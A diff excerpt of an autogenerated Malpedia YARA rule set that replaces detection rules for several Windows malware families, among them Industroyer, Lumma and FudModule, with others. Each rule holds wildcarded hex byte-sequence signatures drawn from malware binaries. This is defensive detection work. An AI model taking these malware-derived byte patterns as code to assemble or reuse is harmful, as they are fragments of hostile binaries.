-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oderoor_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ragnarok_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "705d5b4a266b0c2f312f72fd5cb1e86ab39ec049fd53173701ccf137ec51b933"
+		logic_hash = "ed2a7ae77b63d671045bd4aedbd475a1c70e0fa7ad07494ab8d71c8f930faf2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93185,32 +93490,32 @@ rule MALPEDIA_Win_Oderoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2deb1427d9 8c2413 b166 3b01 95 1e c194a0c0b855158d }
-		$sequence_1 = { f8 660fbdd9 6611e5 e8???????? 54 }
-		$sequence_2 = { e9???????? 6689442404 c1ce06 9c 9c 8d642440 e9???????? }
-		$sequence_3 = { 69d20a000000 e8???????? 38f4 c0f304 c1c31c 660fbafb02 89c3 }
-		$sequence_4 = { 686c193202 e8???????? 309c865a407526 b3df e04a 9b 68d69156e5 }
-		$sequence_5 = { 2b984e407fc0 c5adcaa19a9e 1882c1c921d4 06 ed }
-		$sequence_6 = { df570e 29dc 9b 7f65 197e7e a2???????? }
-		$sequence_7 = { 0fbae107 0428 55 895c240c f6d0 660fbae70f 9c }
-		$sequence_8 = { 8d642410 e9???????? 66891407 881424 9c 68f4110af5 }
-		$sequence_9 = { f1 6c aa 620b e3ed e28f 1a00 }
+		$sequence_0 = { 51 ff35???????? ffd3 8bf8 8d8540ffffff 50 }
+		$sequence_1 = { 0fb6c9 0fb689104b4300 c1e108 33d9 8b4d10 c1e910 0fb6c9 }
+		$sequence_2 = { 238574fdffff 338568fdffff 03d9 8b8d58fdffff 13f8 8b8538fdffff 031cc588af4200 }
+		$sequence_3 = { 83c410 5d c3 e8???????? 50 e8???????? 59 }
+		$sequence_4 = { 88043e 46 83fe40 7ce6 }
+		$sequence_5 = { 0b45a0 33c1 895db0 0345e8 03c2 }
+		$sequence_6 = { 8bf8 83c40c 85ff 7576 8b4d08 8bc6 99 }
+		$sequence_7 = { 8b048528754300 5f 894df4 c644032b0a 8b5d08 753b }
+		$sequence_8 = { 334d0c 034df8 034d98 c1c00a 8945ac 8b450c c1c105 }
+		$sequence_9 = { 0f87a9000000 ff24858d6e4100 ff7510 ff750c }
 
 	condition:
-		7 of them and filesize < 13688832
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Ayegent_Auto : FILE
+rule MALPEDIA_Win_Joao_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86255cdd-1f1d-55c6-b402-dbeb5a16b330"
+		id = "0c5eae5c-6b71-5c2d-8653-d15d55163143"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ayegent_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.joao_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "3b986bb07fdbef1927d912b3187f0b83148fd82afd809d6a4ef770e3327faaed"
+		logic_hash = "a16bd14cef032c190157889a218a60983ef70bb2ccc40760ffd00615dd49093e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93224,34 +93529,34 @@ rule MALPEDIA_Win_Ayegent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894c2411 8dbc2431030000 894c2415 889c2430030000 884c2419 b981000000 }
-		$sequence_1 = { 8d3449 2bd1 8d34b5c8764000 832600 83c60c 4a }
-		$sequence_2 = { e8???????? b940000000 33c0 8dbc2459040000 889c2458040000 f3ab }
-		$sequence_3 = { 8a842440020000 83c418 3ac3 751f 8b7c241c }
-		$sequence_4 = { 66ab aa 8d442408 56 50 ff15???????? 8d4c2408 }
-		$sequence_5 = { 3bf7 0f8e07ffffff 5f 5e }
-		$sequence_6 = { 8d7c2421 885c2420 f3ab 66ab 8d4c2420 }
-		$sequence_7 = { 66894c2404 33c0 8d4c2400 89442407 68???????? 51 }
-		$sequence_8 = { 56 e8???????? 85c0 7438 8bbc243c010000 8b1d???????? 8d4c2434 }
-		$sequence_9 = { 57 8b3d???????? 56 ffd7 83f807 }
+		$sequence_0 = { 6a00 6a00 68b0000000 b9???????? e8???????? }
+		$sequence_1 = { 833f10 720e 8b03 50 e8???????? 8b4510 }
+		$sequence_2 = { 741c 8b0f 8908 8d4804 83c704 }
+		$sequence_3 = { 40 50 8d4ef0 51 53 e8???????? }
+		$sequence_4 = { e8???????? 83c404 897e14 897e18 897e1c 8b4604 }
+		$sequence_5 = { c745d000000000 85c9 746f 8b4320 03c6 8945cc }
+		$sequence_6 = { 837de810 8b45d4 7303 8d45d4 52 51 50 }
+		$sequence_7 = { 52 8d4dd0 e8???????? 83f8ff 740b 6aff 50 }
+		$sequence_8 = { 3bd1 7299 837de810 720c }
+		$sequence_9 = { 52 8bce c745f802000000 897dfc e8???????? }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 2867200
 }
-rule MALPEDIA_Win_Industroyer_Auto : FILE
+rule MALPEDIA_Win_Polpo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4666d9b8-e696-5bb0-aac9-aa0f0ad9f1b7"
+		id = "3ada2ef2-9c7f-50f6-a216-72665dfc2af3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industroyer_auto.yar#L1-L376"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polpo_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "6dea509664f187f90fcd96f2db4ab697e4dc6a135630fab4d4323ee78e00c0a5"
+		logic_hash = "72d335a1b2528c04f03bf454be2a2837ab466ed1973103cf7af4c8dafa43e467"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -93263,62 +93568,32 @@ rule MALPEDIA_Win_Industroyer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745d404000000 e8???????? 50 8945e0 }
-		$sequence_1 = { 8b35???????? 83c014 894dec 034df4 034df0 }
-		$sequence_2 = { 56 6a03 ff7304 56 ff33 ff15???????? 85c0 }
-		$sequence_3 = { 6a03 56 6a01 6800000080 8d85e8faffff 50 }
-		$sequence_4 = { ff7508 33db 43 53 56 }
-		$sequence_5 = { 50 57 6805000020 53 c745f004000000 }
-		$sequence_6 = { ff7508 8d85f8fdffff 56 56 50 ff15???????? f7d8 }
-		$sequence_7 = { 8b450c 57 ff30 ff35???????? ffd6 }
-		$sequence_8 = { ffb598f3ffff ffd7 6800020000 8d85a0fbffff 50 }
-		$sequence_9 = { 6a02 ff15???????? 8bd8 85db 0f849d000000 8d85d0fdffff }
-		$sequence_10 = { 0f46f9 57 e8???????? 83c404 8bf0 8d45fc }
-		$sequence_11 = { b870100000 e8???????? a1???????? 33c5 8945fc 53 33db }
-		$sequence_12 = { 0fb6db 8b859cefffff 0f44df 83c604 }
-		$sequence_13 = { ff15???????? 8bf0 83feff 743c 6690 }
-		$sequence_14 = { 0f1145c0 50 0f1005???????? 6802000080 0f1145d0 ff15???????? }
-		$sequence_15 = { 85c0 7431 ff35???????? 8d442448 50 ffd6 }
-		$sequence_16 = { ffd7 59 e9???????? c745dc03000000 eb7c c745e0e0ff4000 }
-		$sequence_17 = { 898770020000 c70100000000 c7410400000000 c7410800000000 }
-		$sequence_18 = { 8bec 56 8bf1 57 8b7d08 57 8b0e }
-		$sequence_19 = { ff542414 83c404 ff742414 ff15???????? 57 ff15???????? ff15???????? }
-		$sequence_20 = { 83f81d 7cf1 eb07 8b0cc5dc084100 894de4 85c9 7455 }
-		$sequence_21 = { 7311 f30f7e0e 83e908 8d7608 660fd60f 8d7f08 8b048dc4ab4000 }
-		$sequence_22 = { 68???????? e8???????? 83c40c 8bb5f4efffff c6460101 }
-		$sequence_23 = { 6bc930 8b0485d01f0210 f644082801 7406 8b440818 5d }
-		$sequence_24 = { 8b0d???????? 81c178020100 890d???????? 8b4df4 }
-		$sequence_25 = { 0f851c0b0000 8d0d90fd4000 ba1b000000 e9???????? a900000080 }
-		$sequence_26 = { e8???????? 8b4604 0fb64003 50 68???????? e8???????? }
-		$sequence_27 = { 50 ff15???????? 85c0 7407 6a00 ffd0 83c404 }
-		$sequence_28 = { eb55 8b1c9db8c14000 56 6800080000 }
-		$sequence_29 = { 68???????? ff15???????? 6880ee3600 ff15???????? }
-		$sequence_30 = { 8b04b8 03c6 50 51 8b4c2428 }
-		$sequence_31 = { 83e802 7506 80790504 7420 33c0 5e }
-		$sequence_32 = { 017704 ebb5 8b4dec e8???????? 6a00 }
-		$sequence_33 = { 51 8d4b34 e8???????? 8b4338 894594 }
-		$sequence_34 = { e9???????? 55 8bec 81ecec020000 a1???????? }
-		$sequence_35 = { 8d8d98feffff ff30 e8???????? 8d8d7cfdffff 83fb04 0f86f7020000 }
-		$sequence_36 = { 50 ff36 e8???????? 83c40c 6b450830 }
-		$sequence_37 = { 57 8bfe 83e63f c1ff06 6bf630 8b04bd58984500 f644302880 }
-		$sequence_38 = { 751b 8365e800 c745ec271b4100 8d4de0 e8???????? }
-		$sequence_39 = { 8d8424cc000000 50 57 e8???????? 6a30 }
+		$sequence_0 = { c745bc436f6e6e c745c065637469 c745c46f6e3a20 c745c84b656570 c745cc2d616c69 66c745d07665 884dd3 }
+		$sequence_1 = { 51 8d95dcf7ffff 52 e8???????? 8d85d4f7ffff 50 8d8ddcf7ffff }
+		$sequence_2 = { e8???????? 8be5 5d c20800 81fe00001000 0f878c000000 8b87a0040000 }
+		$sequence_3 = { 57 6800040000 8d95ecfbffff 68???????? 52 e8???????? 83c410 }
+		$sequence_4 = { 85d2 7534 8d45f8 50 e8???????? 8d4df8 51 }
+		$sequence_5 = { 8bc8 83e103 837d0c00 f3a4 741c 8b85a0fdffff 8d959cfdffff }
+		$sequence_6 = { 8995b0fbffff 8a10 40 84d2 75f9 2b85b0fbffff baff020000 }
+		$sequence_7 = { 83c1f0 51 8945dd 8945e1 8945e5 8945e9 8945ed }
+		$sequence_8 = { 83e03f 0fb680c0940120 83e23f 41 884602 8a92c0940120 885603 }
+		$sequence_9 = { 50 8d4ddc 51 8d954cffffff 52 8bce }
 
 	condition:
-		7 of them and filesize < 983040
+		7 of them and filesize < 250880
 }
-rule MALPEDIA_Win_Auriga_Auto : FILE
+rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b04a7a23-d5dd-51a9-9bcd-b8623a771f3d"
+		id = "39243d42-8305-573c-a47b-e4b6dd139aef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.auriga_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whiteblackcrypt_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "ba5e317ff80a4f54d11462b8caf5c19d9418687fbcd32874c6803873b6103354"
+		logic_hash = "660907780e4078f0416bec5591629e01f78308bd70eb5a7d32026bca72fd8322"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93332,34 +93607,34 @@ rule MALPEDIA_Win_Auriga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 56 e8???????? 57 8d85f0f9ffff 50 }
-		$sequence_1 = { 8b35???????? ffd6 8945f4 8b45d4 83c002 }
-		$sequence_2 = { 7410 6681f96c68 7409 0fb74802 ff3488 }
-		$sequence_3 = { 40 40 663bcf 75ea }
-		$sequence_4 = { ff15???????? 85c0 7c1e a1???????? }
-		$sequence_5 = { 7518 ffb5f8fbffff 8b35???????? ffd6 ffb5f4fbffff ffd6 33c0 }
-		$sequence_6 = { 8b0d???????? 03c1 3900 74f0 8b15???????? 56 }
-		$sequence_7 = { 8b5a1c 03dd 8b048b 03c5 8944241c 61 }
-		$sequence_8 = { 0f8ce7010000 8d85e8f9ffff 50 8d85e0f9ffff }
-		$sequence_9 = { 33c0 8945e4 8945f0 8945f4 8d45e0 }
+		$sequence_0 = { 790d b910270000 ff15???????? ebea e8???????? b805000030 31c9 }
+		$sequence_1 = { 4989e8 e8???????? 80be4402000000 4989c1 }
+		$sequence_2 = { 418a530b 4188530f 418a5307 41884307 4188530b 0f8490000000 }
+		$sequence_3 = { 45887801 e8???????? 4131c6 4531ca 4531ee 410fb6ca }
+		$sequence_4 = { e8???????? 4889c7 4989d9 41b800000002 }
+		$sequence_5 = { c744242c413a5c00 89c5 f20f2acb 488b05???????? }
+		$sequence_6 = { 83e820 8801 48ffc1 ebe8 c3 }
+		$sequence_7 = { 4188530f 418a5307 41884307 4188530b 0f8490000000 }
+		$sequence_8 = { 488d1da9890000 488d35a2890000 4839de 74df 488b03 4885c0 }
+		$sequence_9 = { 410f94c2 4409d0 4109cb 753a 84c0 }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Lumma_Auto : FILE
+rule MALPEDIA_Win_Mim221_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1dee4d5d-9b7b-5ecd-98af-fd03e9ff26e5"
+		id = "73f86bbf-82d0-5204-a2d1-b26dcb4711e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lumma_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mim221_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "3a8b83c4e573eb9f46c2ea015108cf5619d754c9ccdb93831085f7f3bab02530"
+		logic_hash = "bd2938d5a81d44d76221abdf1ea92c7bf7be6210ea127474e453ccedb94f51d9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -93371,79 +93646,71 @@ rule MALPEDIA_Win_Lumma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff767c ff7678 ff7644 }
-		$sequence_1 = { ff7608 ff7044 ff503c 83c414 }
-		$sequence_2 = { ff7134 ff5130 83c410 85c0 }
-		$sequence_3 = { e8???????? 833800 740a e8???????? 833822 }
-		$sequence_4 = { 894610 8b461c c1e002 50 }
-		$sequence_5 = { ff770c ff37 ff7134 ff5130 }
-		$sequence_6 = { 83c410 85c0 7407 8907 }
-		$sequence_7 = { ff7678 ff7644 ff563c 83c414 }
-		$sequence_8 = { 017e78 83567c00 017e68 83566c00 }
-		$sequence_9 = { 83c40c 6a02 6804010000 e8???????? }
-		$sequence_10 = { 8d8672920300 ff7604 57 50 }
-		$sequence_11 = { ff7034 ff5030 83c410 85c0 }
-		$sequence_12 = { 41 5a cb 55 89e5 }
-		$sequence_13 = { e8???????? 83c40c 017e58 297e5c 03be8c000000 }
-		$sequence_14 = { 59 41 58 5a 59 41 5a }
-		$sequence_15 = { f6460a04 7507 837e3c30 0f92c0 }
-		$sequence_16 = { c70000000000 85c9 7406 c70100000000 c7466cfeffffff b8feffffff 5e }
-		$sequence_17 = { e8???????? 83c40c 019e8c000000 39ef }
+		$sequence_0 = { 4c89442418 53 57 4883ec38 498bc1 498bd8 4c8bd2 }
+		$sequence_1 = { 56 57 4154 4c8bdc 4883ec38 488b05???????? 4c8d25f5b80000 }
+		$sequence_2 = { ff15???????? 85c0 0f84e5000000 c7442428ff000000 488d442470 4889442420 }
+		$sequence_3 = { 6689942478020000 66b92500 66898c247a020000 668984247c020000 668994247e020000 66c78424800200003b00 6689942482020000 }
+		$sequence_4 = { 57 4154 4155 4156 4157 4881ec80010000 48c7842428010000feffffff }
+		$sequence_5 = { 4883f905 72eb eb1d 488d842440050000 3910 7711 4883c101 }
+		$sequence_6 = { 66c74424666f00 66c74424686400 66c744246a6500 66c744246c5300 668944246e 66c74424707200 66c74424726900 }
+		$sequence_7 = { c3 4533c0 488d15be910100 498bc8 66666690 }
+		$sequence_8 = { 0f8c6b010000 8bc7 488d153b7b0100 412bc4 3bc5 0f8260ffffff e9???????? }
+		$sequence_9 = { 488bf8 483bc3 7504 33c0 eb58 498d5708 895c2430 }
 
 	condition:
-		7 of them and filesize < 1115136
+		7 of them and filesize < 471040
 }
-rule MALPEDIA_Win_Fakeword_Auto : FILE
+rule MALPEDIA_Win_Unidentified_073_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7169860f-e999-5507-9589-e70286203456"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fakeword_auto.yar#L1-L128"
+		id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26"
+		date = "2022-08-05"
+		modified = "2022-08-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_073_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "76d399ff443db77ecdb848e572804a47dc4d5691a8ae699933905dad0bc0467f"
+		logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20220805"
+		malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71"
+		malpedia_version = "20220808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 68fa0f0000 57 55 ff15???????? 8b4c2410 }
-		$sequence_1 = { 85c9 7445 33c0 85c9 7623 8b3d???????? }
-		$sequence_2 = { 8b442408 56 57 8d7001 56 ff15???????? 85c0 }
-		$sequence_3 = { 85d2 7405 46 89742424 0fafce 6a40 6800100000 }
-		$sequence_4 = { e8???????? 8b0d???????? 83c40c 83c704 6a00 57 56 }
-		$sequence_5 = { 8b3d???????? 83c40c 68???????? 56 ffd7 8d54240c }
-		$sequence_6 = { 8b15???????? 892d???????? 3bd3 7f1a }
-		$sequence_7 = { 2bc7 3d20010000 7f0e 83f812 0f8e0d010000 ba01000000 89542440 }
-		$sequence_8 = { 5b 83c44c c3 56 57 6a00 e8???????? }
-		$sequence_9 = { ffd6 8d8c2418010000 68???????? 51 ffd6 893d???????? 8b03 }
+		$sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce }
+		$sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff }
+		$sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 }
+		$sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 }
+		$sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 }
+		$sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 }
+		$sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c }
+		$sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? }
+		$sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 }
+		$sequence_9 = { 57 6aff 68???????? 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 1974272
 }
-rule MALPEDIA_Win_Stresspaint_Auto : FILE
+rule MALPEDIA_Win_Decaf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c5fe12e-e2db-536e-9708-f093f3acd070"
+		id = "67190af4-1ce0-57cf-b346-2c883278a90f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stresspaint_auto.yar#L1-L157"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.decaf_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d6c444a9c27d97e7ed3d7b7007c87aa66e22a92b316794a07d87a908d3a44119"
+		logic_hash = "7a70ed6fa2a0ce3cf4802d2d0ae4afe2a54da0a94bb0916dbc97593071b29978"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93457,38 +93724,32 @@ rule MALPEDIA_Win_Stresspaint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0103 014510 294514 83665800 }
-		$sequence_1 = { 8d54241c 52 6880000000 e8???????? }
-		$sequence_2 = { 0106 83560400 837d1c00 7494 }
-		$sequence_3 = { 0103 ebaa 8b442408 56 }
-		$sequence_4 = { 0107 115f04 3bcb 7508 }
-		$sequence_5 = { 0108 8b8e44010000 114804 8b4f18 }
-		$sequence_6 = { 8d54241c 52 50 56 e8???????? 8b4c243c }
-		$sequence_7 = { 8d54241c 52 51 55 }
-		$sequence_8 = { 8d54241c 52 56 50 e8???????? 83c40c }
-		$sequence_9 = { 0107 83570400 85c9 7508 }
-		$sequence_10 = { 8d54241c 52 50 57 e8???????? 53 }
-		$sequence_11 = { 010b 8945fc 8bc2 83530400 }
-		$sequence_12 = { 8d54241c 52 8d8424e4000000 6800040000 }
-		$sequence_13 = { 0103 014510 294674 8b4674 }
-		$sequence_14 = { 8d54241c 51 8d442430 52 50 55 56 }
-		$sequence_15 = { 8d54241c 52 56 ff5718 56 53 }
+		$sequence_0 = { be02000000 e8???????? 0fb6542459 0fb6742458 29f2 8810 0fb6542457 }
+		$sequence_1 = { e8???????? 48c7400817000000 488d0dd8a81600 488908 48c7401000000000 4889c3 488d05d7e71300 }
+		$sequence_2 = { e9???????? 4c8d4302 4c39c6 7337 4c89442468 488d05d8a30300 4889d9 }
+		$sequence_3 = { eb12 4883fa03 750c 488d157e013400 f0480fc102 ba01000000 4c8d059d053400 }
+		$sequence_4 = { ffd1 488b08 4889c2 b8c7ffffff ffd1 48c744241000000000 488b4c2428 }
+		$sequence_5 = { 488b8c24f01c0000 48894818 eb11 488d7818 488b8c24f01c0000 e8???????? 488b8c24100a0000 }
+		$sequence_6 = { 4983f804 0f8f72010000 90 4983f802 0f8faf000000 4d85c0 755b }
+		$sequence_7 = { 488d3dcb351c00 e8???????? e8???????? 48898424e0030000 48899c2408010000 488b0d???????? 48898c24c8050000 }
+		$sequence_8 = { e8???????? 488b442478 488b4c2470 488b942488000000 ebbd 90 488d05bfff1d00 }
+		$sequence_9 = { eb14 488d7818 488b8c2470220000 0f1f00 e8???????? 488b8c24a8030000 48894808 }
 
 	condition:
-		7 of them and filesize < 1155072
+		7 of them and filesize < 7193600
 }
-rule MALPEDIA_Win_Fudmodule_Auto : FILE
+rule MALPEDIA_Win_Zeus_Action_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bbb969f6-fc21-5df2-98a0-24465f1a52fb"
+		id = "d8b9574e-a0e7-5ba7-a640-3d17643b0cca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fudmodule_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_action_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "3c836db347337427da5b8480cbffb4c9a34ff35d9d7cf56625d940236b49e08c"
+		logic_hash = "3c34c6384d3102dcf930744109cb986bdc2576d8925ca3fbe6fecc099028fdf3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93502,38 +93763,32 @@ rule MALPEDIA_Win_Fudmodule_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3446 4839eb f9 f5 }
-		$sequence_1 = { c7451079737465 c745146d496e66 c745186f726d61 c7451c74696f6e c6452000 c745c04e745772 c745c469746556 }
-		$sequence_2 = { 4585ed 0f8416010000 488d3cb0 ff15???????? 488d542448 488bc8 488d442460 }
-		$sequence_3 = { eb20 4c8d25c0e00000 488b0d???????? bf01000000 897c2460 ff15???????? 4c8be8 }
-		$sequence_4 = { c745ae6e006500 66897db2 c745b453007900 c745b873007400 }
-		$sequence_5 = { 488d3ca51c3489c2 0f8f7cf20100 660fbdfe 4801e3 66c1d707 66f7c74b20 }
-		$sequence_6 = { 29d2 c0c804 89d0 24a6 4883c701 }
-		$sequence_7 = { 488b05???????? 4833c4 48894527 33c0 4533ed 4c8bf1 458d4504 }
-		$sequence_8 = { 0f87833b0200 0fa3d5 f9 f5 69d20a000000 }
-		$sequence_9 = { 660fa3e0 29d9 6629ce 660fbcf6 }
-		$sequence_10 = { 488d442438 4d8bc4 4889442420 41ff96d00d0000 ba4d5a0000 663955a0 }
-		$sequence_11 = { c744246c69006c00 c744247065005300 66898552010000 c744247673007400 c744247a65006d00 }
-		$sequence_12 = { 38e9 30c0 f9 f2ae 0f89bb620100 }
-		$sequence_13 = { 418d5d08 bf80250000 660f1f840000000000 488d4c2460 33d2 41b800020000 }
-		$sequence_14 = { fec8 f6c65a fec0 b02e 80fec3 }
-		$sequence_15 = { 4829fb 66ffc7 d2f8 66ffcf f8 4801e3 660fadd7 }
+		$sequence_0 = { 56 57 ff15???????? 85c0 0f4975e8 57 e8???????? }
+		$sequence_1 = { 8995c4feffff 8b75f4 4e 0f8494010000 8b83a8020000 83f8ff 0f840d010000 }
+		$sequence_2 = { 731b 2b45d8 6a20 03c8 894df4 5b 85f6 }
+		$sequence_3 = { 8bec 81ec10050000 53 33db 817d180000a000 56 57 }
+		$sequence_4 = { eb17 897e0c 897e08 897e04 893e 897e2c }
+		$sequence_5 = { d1e9 03c1 99 f7ff 8b7d10 8a4f0c d3e0 }
+		$sequence_6 = { 8d1c79 3bcb 7320 8b5508 0fb706 83c602 668b0442 }
+		$sequence_7 = { 59 89442408 85c0 7506 40 e9???????? e8???????? }
+		$sequence_8 = { 1bc0 f7d8 59 59 7514 3974240c 740e }
+		$sequence_9 = { 53 56 8b35???????? 57 68???????? ff7508 8d85a4fbffff }
 
 	condition:
-		7 of them and filesize < 795648
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Bitsran_Auto : FILE
+rule MALPEDIA_Win_Roadsweep_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "704b65b3-af59-52e9-9dfb-e042a4dda0d0"
+		id = "02905efb-d1f3-5f29-9698-5892918b9e96"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitsran_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roadsweep"
